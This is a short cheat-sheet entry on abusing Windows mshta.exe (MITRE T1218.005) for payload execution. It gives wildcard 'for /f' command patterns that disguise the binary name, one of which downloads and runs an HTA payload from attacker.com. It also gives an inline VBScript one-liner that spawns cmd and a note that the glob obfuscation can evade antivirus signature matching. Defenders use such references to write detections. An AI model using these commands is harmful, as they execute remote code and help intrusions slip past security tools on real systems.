mshta

Windows CMD execution T1218.005

Microsoft HTML Application host. Executes HTA files or inline VBScript/JScript — commonly used for payload execution and initial access.

Binary Paths

C:\Windows\System32\mshta.exe
C:\Windows\SysWOW64\mshta.exe

Glob Patterns

Pattern	Wildcards	Notes
`for /f %i in ('where mshta*') do %i http://attacker.com/payload.hta`	*	Star matches '.exe'
`for /f %i in ('where m*ta.exe') do %i`	*	Star replaces 'sh'
`for /f %i in ('where ms?ta.exe') do %i`	?	Single char wildcard replaces 'h'
`for /f %i in ('dir /b C:\Windows\System32\ms*ta.exe') do %i`	*	dir glob search

Platform Notes

mshta.exe can run HTA files from local paths or URLs. Example: mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""cmd"":close"). Blocked by many modern AV products but glob name obfuscation may bypass signature matching on process names.

Resources

https://attack.mitre.org/techniques/T1218/005/
https://lolbas-project.github.io/lolbas/Binaries/Mshta/